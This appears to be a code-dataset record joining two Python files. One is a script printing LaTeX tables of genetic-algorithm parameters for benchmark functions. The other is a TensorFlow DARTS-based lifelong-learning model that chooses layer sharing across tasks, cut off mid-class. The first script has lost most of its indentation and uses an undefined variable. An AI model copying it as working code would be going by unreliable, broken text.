params_real = {'PS_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional'}, 'Beale': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.25, 'max_iter': 1000, 'selection': 'proportional'}}, 'PS_E_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.5, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.2}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.2}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.1}}, 'TS_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'tournament'}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'tournament'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.25, 'max_iter': 1000, 'selection': 'tournament'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament'}}, 'TS_E_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.2}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}}, 'SUS_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus'}, 'Beale': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.5, 'max_iter': 1000, 'selection': 'sus'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'sus'}}, 'SUS_E_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.5, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.2, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.3}}}
# table = Texttable()
# table.set_deco(Texttable.HEADER)
# table.set_cols_dtype(['t', # text
# 'i',
# 'f',
# 'i',
# 't'])
# # 'f', # float (decimal)
# # 'e', # float (exponent)
# # 'i', # integer
# # 'a']) # automatic
# table.set_cols_align(["l", "r", "r", "r", "l"])
for k, v in params_bin.items():
cols = ["Function"] + list(params_bin[k]["Rastrigin"].keys())
for i in range(len(cols)):
cols[i] = cols[i].replace("_", " ")
table = Texttable()
table.set_deco(Texttable.HEADER)
if len(cols) == 6:
table.set_cols_dtype(['t', # text
'i',
'f',
'f',
'i',
't'])
table.set_cols_align(["l", "r", "r", "r", "r", "l"])
    elif len(cols) == 7:
        # column order: Function, n individuals, pc, pm, max iter, selection, elitism
        table.set_cols_dtype(['t',  # text
                              'i',
                              'f',
                              'f',
                              'i',
                              't',   # 'selection' is a string
                              'f'])  # 'elitism' is a float
        table.set_cols_align(["l", "r", "r", "r", "r", "l", "r"])
rows = [cols]
#table.add_rows(cols)
for_caption = k.replace("_", " ")
for k1, v1 in v.items():
first_column = k1
row = [first_column]
for v2 in v1.values():
row += [v2]
rows += [row]
table.add_rows(rows)
#print(table.draw() + "\n")
print(latextable.draw_latex(table, caption=f"{for_caption} parameters.", label=for_caption) + "\n")
for k, v in params_real.items():
cols = ["Function"] + list(params_real[k]["Rastrigin"].keys())
for i in range(len(cols)):
cols[i] = cols[i].replace("_", " ")
table = Texttable()
table.set_deco(Texttable.HEADER)
if len(cols) == 6:
table.set_cols_dtype(['t', # text
'i',
'f',
'f',
'i',
't'])
table.set_cols_align(["l", "r", "r", "r", "r", "l"])
    elif len(cols) == 7:
        # column order: Function, n individuals, pc, pm, max iter, selection, elitism
        table.set_cols_dtype(['t',  # text
                              'i',
                              'f',
                              'f',
                              'i',
                              't',   # 'selection' is a string
                              'f'])  # 'elitism' is a float
        table.set_cols_align(["l", "r", "r", "r", "r", "l", "r"])
rows = [cols]
    for_caption = k.replace("_", " ")
    #table.add_rows(cols)
for k1, v1 in v.items():
first_column = k1
row = [first_column]
for v2 in v1.values():
row += [v2]
rows += [row]
table.add_rows(rows)
#print(table.draw() + "\n")
print(latextable.draw_latex(table, caption=f"{for_caption} parameters.", label=for_caption) + "\n")
# table.add_rows([cols,
# ["abcd", "67", 654, 89, 128.001],
# ["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
# ["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
# ["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
# print(table.draw() + "\n")
# print(latextable.draw_latex(table, caption="Another table.", label="table:another_table") + "\n")
# print(latextable.draw_latex(table, caption="A table with dropped columns.", label="table:dropped_column_table", drop_columns=['exp', 'int']))
# rows = list(params_bin["PS_BINARY"].keys())
# table_bin = tabulate(params_bin["PS_BINARY"])
# table_real = tabulate(params_real["PS_REAL"])
# print(table_bin)
# print(table_real) | 82.084034 | 3,086 | 0.569308 | 1,279 | 9,768 | 4.20172 | 0.102424 | 0.107183 | 0.133978 | 0.151842 | 0.861556 | 0.846669 | 0.842017 | 0.807964 | 0.77112 | 0.744325 | 0 | 0.136729 | 0.198096 | 9,768 | 119 | 3,087 | 82.084034 | 0.549343 | 0.131245 | 0 | 0.805195 | 0 | 0 | 0.338228 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051948 | 0 | 0.051948 | 0.025974 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
037413479ba910a5d397529d856cb37b484a5f0e | 45,838 | py | Python | classification/model/cnn_darts_model.py | Lifelong-ML/LASEM | c4ec052c850e37f54bc3e6faf6b988a4c5239f10 | [
"MIT"
] | 8 | 2021-07-06T14:35:50.000Z | 2022-03-03T08:45:13.000Z | classification/model/cnn_darts_model.py | Lifelong-ML/LASEM | c4ec052c850e37f54bc3e6faf6b988a4c5239f10 | [
"MIT"
] | null | null | null | classification/model/cnn_darts_model.py | Lifelong-ML/LASEM | c4ec052c850e37f54bc3e6faf6b988a4c5239f10 | [
"MIT"
] | 1 | 2021-07-09T09:26:11.000Z | 2021-07-09T09:26:11.000Z | import tensorflow as tf
import numpy as np
from random import shuffle
from utils.utils import get_value_of_valid_tensors, savemat_wrapper, savemat_wrapper_nested_list, count_trainable_var2
from utils.utils import new_weight, new_bias, new_ELLA_KB_param, get_list_of_valid_tensors, data_x_add_dummy, data_x_and_y_add_dummy
from utils.utils_nn import new_flexible_hardparam_cnn_fc_nets, new_darts_cnn_fc_net
from utils.utils_df_nn import new_ELLA_flexible_cnn_deconv_tensordot_fc_net, new_darts_dfcnn_fc_net
from classification.model.lifelong_model_frame import Lifelong_Model_Frame
_tf_ver = tf.__version__.split('.')
_up_to_date_tf = int(_tf_ver[0]) > 1 or (int(_tf_ver[0])==1 and int(_tf_ver[1]) >= 14)
if _up_to_date_tf:
_tf_tensor = tf.is_tensor
else:
_tf_tensor = tf.contrib.framework.is_tensor
########################################################
#### DARTS (Differentiable Architecture Search) ####
#### based Selective Sharing baseline model ####
########################################################
class LL_HPS_CNN_DARTS_net(Lifelong_Model_Frame):
def __init__(self, model_hyperpara, train_hyperpara):
super().__init__(model_hyperpara, train_hyperpara)
        self.approx_order = model_hyperpara['darts_approx_order']
self.conv_sharing = []
def _possible_choices(input_subsets):
list_subsets = []
for c in [False, True]:
for elem in input_subsets:
list_subsets.append(elem+[c])
return list_subsets
self._possible_configs = [[]]
for layer_cnt in range(self.num_conv_layers):
self._possible_configs = _possible_choices(self._possible_configs)
self.num_possible_configs = len(self._possible_configs)
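        # _possible_configs enumerates every per-layer share/not-share choice,
        # giving 2**num_conv_layers configurations. For example, with two conv
        # layers the list is [[F,F], [T,F], [F,T], [T,T]], so the config at
        # index i shares layer l iff bit l of i is set (see best_config below).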
def _build_task_model(self, net_input, output_size, task_cnt, params=None, trainable=False):
if params is None:
params_shared_conv, params_TS_conv, params_fc = None, None, None
else:
params_shared_conv, params_TS_conv, params_fc = params['Shared_Conv'], params['TS_Conv'], params['FC']
        if params_TS_conv is not None:
            assert (len(params_TS_conv) == 2*self.num_conv_layers), "Given trained conv parameters do not match the hyper-parameters!"
        if params_fc is not None:
            assert (len(params_fc) == 2*self.num_fc_layers), "Given trained fc parameters do not match the hyper-parameters!"
eval_net = []
if (task_cnt==self.current_task) and self.task_is_new:
## DARTS-based Hybrid HPS
with tf.name_scope('DARTS_HPS'):
task_net, _, conv_TS_params, conv_select_params, fc_params = new_darts_cnn_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], cnn_activation_fn=self.hidden_act, cnn_shared_params=params_shared_conv, cnn_TS_params=params_TS_conv, select_params=None, fc_activation_fn=self.hidden_act, fc_params=params_fc, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2], trainable=trainable)
self.conv_select_params = conv_select_params
## build network for evaluation
for conf in self._possible_configs:
net_tmp, _, _, _ = new_flexible_hardparam_cnn_fc_nets(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], conf, cnn_activation_fn=self.hidden_act, shared_cnn_params=params_shared_conv, cnn_params=conv_TS_params, fc_activation_fn=self.hidden_act, fc_params=fc_params, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, padding_type=self.padding_type, input_size=self.input_size[0:2], trainable=trainable, trainable_shared=trainable)
eval_net.append(net_tmp[-1])
else:
## Hybrid HPS with the learned configuration
task_net, conv_TS_params, _, fc_params = new_flexible_hardparam_cnn_fc_nets(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], self.conv_sharing[task_cnt], cnn_activation_fn=self.hidden_act, shared_cnn_params=params_shared_conv, cnn_params=params_TS_conv, fc_activation_fn=self.hidden_act, fc_params=params_fc, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, padding_type=self.padding_type, input_size=self.input_size[0:2], trainable=trainable, trainable_shared=trainable)
return task_net, eval_net, conv_TS_params, fc_params
def _build_whole_model(self):
for task_cnt, (num_classes, x_b) in enumerate(zip(self.output_sizes, self.x_batch)):
if (task_cnt==self.current_task) and (self.task_is_new):
param_to_reuse = {'Shared_Conv': self.shared_conv_params, 'TS_Conv': None, 'FC': None}
else:
param_to_reuse = {'Shared_Conv': self.shared_conv_params, 'TS_Conv': self.np_params[task_cnt]['TS_Conv'], 'FC': self.np_params[task_cnt]['FC']}
task_net, eval_net, conv_TS_params, fc_params = self._build_task_model(x_b, num_classes, task_cnt, params=param_to_reuse, trainable=(task_cnt==self.current_task))
self.task_models.append(task_net)
self.conv_params.append(conv_TS_params)
self.fc_params.append(fc_params)
self.params.append(self._collect_trainable_variables())
self.num_trainable_var += count_trainable_var2(self.params[-1]) if task_cnt < 1 else count_trainable_var2(self.params[-1]) - self.shared_conv_params_size
if len(eval_net) > 0:
self.darts_eval_models = eval_net
#self.conv_trainable_param = get_list_of_valid_tensors(self.conv_params[self.current_task])
#self.fc_trainable_param = get_list_of_valid_tensors(self.fc_params[self.current_task])
#self.trainable_params = list(self.dfcnn_KB_trainable_param) + list(self.dfcnn_TS_trainable_param) + list(self.conv_trainable_param) + list(self.fc_trainable_param)
def add_new_task(self, output_dim, curr_task_index, single_input_placeholder=False):
self.conv_select_params, self.darts_eval_models = None, None
self._shared_param_init()
super().add_new_task(output_dim, curr_task_index, single_input_placeholder=single_input_placeholder)
def _shared_param_init(self):
shared_conv_init_val = self.np_params[0]['Shared_Conv'] if hasattr(self, 'np_params') else [None for _ in range(2*self.num_conv_layers)]
self.shared_conv_params = []
for layer_cnt in range(self.num_conv_layers):
self.shared_conv_params.append(new_weight(shape=self.cnn_kernel_size[2*layer_cnt:2*(layer_cnt+1)]+self.cnn_channels_size[layer_cnt:layer_cnt+2], init_tensor=shared_conv_init_val[2*layer_cnt], trainable=True, name='Shared_Conv_W%d'%(layer_cnt)))
self.shared_conv_params.append(new_bias(shape=[self.cnn_channels_size[layer_cnt+1]], init_tensor=shared_conv_init_val[2*layer_cnt+1], trainable=True, name='Shared_Conv_b%d'%(layer_cnt)))
self.shared_conv_params_size = count_trainable_var2(self.shared_conv_params)
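        # shared_conv_params is laid out as [W0, b0, W1, b1, ...] (two entries
        # per conv layer), which is why indices 2*layer_cnt and 2*layer_cnt+1
        # are used throughout this class.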
def get_darts_selection_val(self, sess):
return get_value_of_valid_tensors(sess, self.conv_select_params)
def get_params_val(self, sess, use_npparams=True):
selection_params_val = self.get_darts_selection_val(sess)
if use_npparams:
shared_conv_val = self.np_params[0]['Shared_Conv']
TS_conv_val = [np_p['TS_Conv'] for np_p in self.np_params]
fc_val = [np_p['FC'] for np_p in self.np_params]
else:
shared_conv_val = get_value_of_valid_tensors(sess, self.shared_conv_params)
TS_conv_val = [get_value_of_valid_tensors(sess, cnn_TS_param) for cnn_TS_param in self.conv_params]
fc_val = [get_value_of_valid_tensors(sess, fc_param) for fc_param in self.fc_params]
parameters_val = {}
parameters_val['DARTS_selection_param'] = savemat_wrapper(selection_params_val)
parameters_val['shared_conv'] = savemat_wrapper(shared_conv_val)
parameters_val['TS_conv'] = savemat_wrapper_nested_list(TS_conv_val)
parameters_val['fc_weights'] = savemat_wrapper_nested_list(fc_val)
return parameters_val
def best_config(self, sess):
        ## return the index of the sharing configuration in self._possible_configs implied by the DARTS selection parameters
selection_val = self.get_darts_selection_val(sess)
# argmax 0 -> task-specific / argmax 1 -> shared
selected_config_index = 0
for layer_cnt, (layer_select) in enumerate(selection_val):
selected_config_index = selected_config_index + np.argmax(layer_select) * (2**layer_cnt)
return selected_config_index
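    # Illustrative example: with 3 conv layers and per-layer argmax decisions
    # [1, 0, 1] (shared, task-specific, shared), best_config returns
    # 1*2**0 + 0*2**1 + 1*2**2 = 5, i.e. self._possible_configs[5].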
def darts_learned_selection(self, sess):
        ## return the per-layer sharing decisions (1: shared / 0: task-specific)
        ## derived from the DARTS selection parameters; these become the elements
        ## of self.conv_sharing (e.g. a 'bottom2' pattern is [1,1,0,0,0,..])
selection_val = self.get_darts_selection_val(sess)
sharing_flags = []
for layer_select in selection_val:
sharing_flags.append(np.argmax(layer_select))
return sharing_flags
def define_eval(self):
with tf.name_scope('Model_Eval'):
mask = tf.reshape(tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32), [self.batch_size, 1])
self.eval = [tf.nn.softmax(task_model[-1])*mask for task_model in self.task_models]
self.pred = [tf.argmax(task_model[-1]*mask, 1) for task_model in self.task_models]
if self.task_is_new:
self.eval_for_new_task = [tf.nn.softmax(task_model)*mask for task_model in self.darts_eval_models]
self.pred_for_new_task = [tf.argmax(task_model*mask, 1) for task_model in self.darts_eval_models]
def _loss_func(self, y1, y2):
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.cast(y1, tf.int32), logits=y2))
def define_loss(self):
with tf.name_scope('Model_Loss'):
self.loss = [self._loss_func(y_batch, task_model[-1]) for y_batch, task_model in zip(self.y_batch, self.task_models)]
def define_accuracy(self):
with tf.name_scope('Model_Accuracy'):
mask = tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32)
self.accuracy = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model[-1], 1), tf.cast(y_batch, tf.int64)), tf.float32)*mask) for y_batch, task_model in zip(self.y_batch, self.task_models)]
if self.task_is_new:
self.accuracy_for_new_task = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model, 1), tf.cast(self.y_batch[self.current_task], tf.int64)), tf.float32)*mask) for task_model in self.darts_eval_models]
def define_opt(self):
with tf.name_scope('Optimization'):
self.grads = tf.gradients(self.loss[self.current_task], self.params[self.current_task])
trainer = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.update = trainer.apply_gradients(list(zip(self.grads, self.params[self.current_task])))
if self.task_is_new:
if self.approx_order == 1:
self.selection_grads = tf.gradients(self.loss[self.current_task], self.conv_select_params)
elif self.approx_order == 2:
#new_approx_params = [p-g*(self.learn_rate/(1.0+self.epoch*self.learn_rate_decay)) for (p, g) in zip(self.params[self.current_task], self.grads)]
new_approx_params = [p-g*self.learn_rate for (p, g) in zip(self.params[self.current_task], self.grads)]
new_shared_conv = new_approx_params[0:2*self.num_conv_layers]
new_TS_conv = new_approx_params[2*self.num_conv_layers:4*self.num_conv_layers]
new_fc = new_approx_params[4*self.num_conv_layers:]
unrolled_model, _, _, _, _ = new_darts_cnn_fc_net(self.x_batch[self.current_task], self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[self.output_sizes[self.current_task]], cnn_activation_fn=self.hidden_act, cnn_shared_params=new_shared_conv, cnn_TS_params=new_TS_conv, select_params=self.conv_select_params, fc_activation_fn=self.hidden_act, fc_params=new_fc, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2])
unrolled_loss = self._loss_func(self.y_batch[self.current_task], unrolled_model[-1])
#self.selection_grads = tf.gradients(unrolled_loss, self.conv_select_params)
selection_grads = tf.gradients(unrolled_loss, self.conv_select_params)
dw = tf.gradients(unrolled_loss, new_approx_params)
## compute partial gradient approximating hessian
ratios = [0.01/tf.norm(g) for g in dw]
approx_params_upper = [p+g*r for (p, g, r) in zip(new_approx_params, dw, ratios)]
upper_model, _, _, _, _ = new_darts_cnn_fc_net(self.x_batch[self.current_task], self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[self.output_sizes[self.current_task]], cnn_activation_fn=self.hidden_act, cnn_shared_params=approx_params_upper[0:2*self.num_conv_layers], cnn_TS_params=approx_params_upper[2*self.num_conv_layers:4*self.num_conv_layers], select_params=self.conv_select_params, fc_activation_fn=self.hidden_act, fc_params=approx_params_upper[4*self.num_conv_layers:], padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2])
upper_loss = self._loss_func(self.y_batch[self.current_task], upper_model[-1])
upper_grad = tf.gradients(upper_loss, self.conv_select_params)
approx_params_lower = [p-g*r for (p, g, r) in zip(new_approx_params, dw, ratios)]
lower_model, _, _, _, _ = new_darts_cnn_fc_net(self.x_batch[self.current_task], self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[self.output_sizes[self.current_task]], cnn_activation_fn=self.hidden_act, cnn_shared_params=approx_params_lower[0:2*self.num_conv_layers], cnn_TS_params=approx_params_lower[2*self.num_conv_layers:4*self.num_conv_layers], select_params=self.conv_select_params, fc_activation_fn=self.hidden_act, fc_params=approx_params_lower[4*self.num_conv_layers:], padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2])
lower_loss = self._loss_func(self.y_batch[self.current_task], lower_model[-1])
lower_grad = tf.gradients(lower_loss, self.conv_select_params)
#self.selection_grads = [g-(self.learn_rate/(1.0+self.epoch*self.learn_rate_decay)/(2*r))*(u-l) for (g, r, u, l) in zip(selection_grads, ratios, upper_grad, lower_grad)]
self.selection_grads = [g-(self.learn_rate/(2*r))*(u-l) for (g, r, u, l) in zip(selection_grads, ratios, upper_grad, lower_grad)]
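                    # Second-order DARTS approximation (per Liu et al., 2019):
                    # the architecture gradient is dL/d(alpha) - xi * H * dL/dw,
                    # where H is the mixed second derivative d2L/(d(alpha) dw).
                    # The Hessian-vector product is replaced by the finite
                    # difference (grad_alpha L(w+) - grad_alpha L(w-)) / (2*eps)
                    # with w+/- = w +/- eps*dL/dw and eps = 0.01/||dL/dw||
                    # (the `ratios` above). Note that the same task batch is used
                    # for both the weight and architecture objectives here.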
trainer2 = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.selection_update = trainer2.apply_gradients(list(zip(self.selection_grads, self.conv_select_params)))
def convert_tfVar_to_npVar(self, sess):
if not (self.num_tasks == 1 and self.task_is_new):
orig_KB = list(self.np_params[0]['Shared_Conv']) ## copy of shared conv before training current task
else:
orig_KB = [None for _ in range(2*self.num_conv_layers)]
def list_param_converter(list_of_params):
converted_params = []
for p in list_of_params:
if type(p) == np.ndarray:
converted_params.append(p)
elif _tf_tensor(p):
converted_params.append(sess.run(p))
else:
converted_params.append(p) ## append 'None' param
return converted_params
def double_list_param_converter(list_of_params):
converted_params = []
for task_params in list_of_params:
converted_params.append(list_param_converter(task_params))
return converted_params
def post_process(layers_to_share, original_KB, updated_KB, updated_conv):
for layer_cnt, (sharing_flag) in enumerate(layers_to_share):
                if sharing_flag:
                    ### Sharing this layer -> keep the newly trained shared conv (no action needed) and null out the task-specific conv params
                    updated_conv[self.current_task][2*layer_cnt], updated_conv[self.current_task][2*layer_cnt+1] = None, None
                else:
                    ### Not sharing this layer -> roll back the shared conv and keep the task-specific conv params (no action needed)
                    updated_KB[2*layer_cnt], updated_KB[2*layer_cnt+1] = original_KB[2*layer_cnt], original_KB[2*layer_cnt+1]
return updated_KB, updated_conv
self.np_params = []
if len(self.conv_sharing) < self.num_tasks:
self.conv_sharing.append(self.darts_learned_selection(sess))
np_shared = list_param_converter(self.shared_conv_params)
np_TS = double_list_param_converter(self.conv_params)
np_fc = double_list_param_converter(self.fc_params)
np_shared, np_TS = post_process(self.conv_sharing[self.current_task], orig_KB, np_shared, np_TS)
for t, f in zip(np_TS, np_fc):
self.np_params.append({'Shared_Conv': np_shared, 'TS_Conv': t, 'FC': f} if len(self.np_params)< 1 else {'TS_Conv': t, 'FC': f})
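        # Only the first entry of self.np_params carries 'Shared_Conv'; the shared
        # weights are global across tasks, so later entries hold only the
        # task-specific conv and fc parameters.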
def _collect_trainable_variables(self):
return_list = []
for p in self.shared_conv_params:
if p is not None:
return_list.append(p)
for p in self.conv_params[-1]:
if p is not None:
return_list.append(p)
for p in self.fc_params[-1]:
if p is not None:
return_list.append(p)
return return_list
def train_one_epoch(self, sess, data_x, data_y, epoch_cnt, task_index, learning_indices=None, augment_data=False, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_train = data_x.shape[0]
if learning_indices is None:
learning_indices = list(range(num_train))
shuffle(learning_indices)
for batch_cnt in range(num_train//self.batch_size):
batch_train_x = data_x[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
batch_train_y = data_y[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
if self.task_is_new:
## Update architecture (selection param)
sess.run(self.selection_update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
## Update NN weights
sess.run(self.update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
def eval_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, num_classes = data_x.shape[0], self.output_sizes[task_model_index]
eval_output = np.zeros([num_data, num_classes], dtype=np.float32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
eval_func = self.eval_for_new_task[best_config]
else:
eval_func = self.eval[task_model_index]
for batch_cnt in range(num_batch):
eval_output[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = sess.run(eval_func, feed_dict={self.model_input: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
temp_pred = sess.run(eval_func, feed_dict={self.model_input: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
eval_output[-num_remains:] = temp_pred[0:num_remains]
return eval_output
def infer_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data = data_x.shape[0]
inferred_labels = np.zeros(num_data, dtype=np.int32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
pred_func = self.pred_for_new_task[best_config]
else:
pred_func = self.pred[task_model_index]
for batch_cnt in range(num_batch):
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
inferred_labels[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = np.squeeze(temp_pred)
if num_remains > 0:
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
inferred_labels[-num_remains:] = np.squeeze(temp_pred[0:num_remains])
return inferred_labels
def compute_accuracy_one_task(self, sess, data_x, data_y, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, accuracy = data_x.shape[0], 0.0
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
acc_func = self.accuracy_for_new_task[best_config]
else:
acc_func = self.accuracy[task_model_index]
for batch_cnt in range(num_batch):
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.true_output[task_model_index]: data_y[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
tmp_x, tmp_y = data_x_and_y_add_dummy(data_x[-num_remains:], data_y[-num_remains:], self.batch_size)
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: tmp_x, self.true_output[task_model_index]: tmp_y, self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
return float(accuracy)/float(num_data)
########################################################
#### DARTS (Differentiable Architecture Search) ####
#### based Selective Sharing baseline model ####
########################################################
class LL_DFCNN_DARTS_net(Lifelong_Model_Frame):
def __init__(self, model_hyperpara, train_hyperpara):
super().__init__(model_hyperpara, train_hyperpara)
self.dfcnn_KB_size = model_hyperpara['cnn_KB_sizes']
self.dfcnn_TS_size = model_hyperpara['cnn_TS_sizes']
self.dfcnn_stride_size = model_hyperpara['cnn_deconv_stride_sizes']
self.dfcnn_KB_reg_scale = model_hyperpara['regularization_scale'][1]
self.dfcnn_TS_reg_scale = model_hyperpara['regularization_scale'][3]
        self.approx_order = model_hyperpara['darts_approx_order']
self.conv_sharing = []
def _possible_choices(input_subsets):
list_subsets = []
for c in [False, True]:
for elem in input_subsets:
list_subsets.append(elem+[c])
return list_subsets
self._possible_configs = [[]]
for layer_cnt in range(self.num_conv_layers):
self._possible_configs = _possible_choices(self._possible_configs)
self.num_possible_configs = len(self._possible_configs)
def _build_task_model(self, net_input, output_size, task_cnt, params=None, trainable=False):
if params is None:
params_KB, params_TS, params_conv, params_fc = None, None, None, None
else:
params_KB, params_TS, params_conv, params_fc = params['KB'], params['TS'], params['TS_Conv'], params['FC']
        if params_conv is not None:
            assert (len(params_conv) == 2*self.num_conv_layers), "Given trained conv parameters do not match the hyper-parameters!"
        if params_fc is not None:
            assert (len(params_fc) == 2*self.num_fc_layers), "Given trained fc parameters do not match the hyper-parameters!"
eval_net = []
if (task_cnt==self.current_task) and self.task_is_new:
## DARTS-based DF-CNN
with tf.name_scope('DARTS_DFCNN'):
